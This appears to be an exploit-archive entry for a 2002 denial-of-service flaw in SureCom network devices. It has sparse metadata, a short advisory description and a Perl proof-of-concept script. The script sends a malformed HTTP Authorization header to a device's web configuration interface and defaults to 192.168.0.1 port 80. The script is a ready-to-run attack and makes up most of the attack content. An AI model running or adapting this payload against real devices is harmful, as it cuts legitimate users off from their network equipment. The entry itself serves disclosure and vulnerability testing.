SureCom Network Devices Denial of Service Vulnerability

vendor:

Network Devices

by:

SecurityFocus

7.5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: Network Devices

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

SureCom Network Devices Denial of Service Vulnerability

An issue in the handling of specific web requests by SureCom network devices has been identified. By placing a malformed request to the web configuration interface, it is possible for an attacker to deny service to legitimate users of a vulnerable device.

Mitigation:

N/A

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9795/info

An issue in the handling of specific web requests by SureCom network devices has been identified. By placing a malformed request to the web configuration interface, it is possible for an attacker to deny service to legitimate users of a vulnerable device.

#!/usr/bin/perl


use IO::Socket;


# default settings

$server = "192.168.0.1";
$port = "80";
$http_request = "GET / HTTP/1.1\r\nAuthorization: B 00000000\r\n\r\n";

if(@ARGV == 2) {

        $server = $ARGV[0];
        $port = $ARGV[1];

}
else {

        print "Usage: ./surecom_tester [address] [port]\n\n";
        print "Using default settings...\n\n";

}

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server,
PeerPort=>$port)
  or die "ERROR: can't connect to $server on port $port\n\n";
print $socket $http_request;
$http_response = <$socket>;
print "The server's not vulnerable and replied with " . $http_response .
"\n";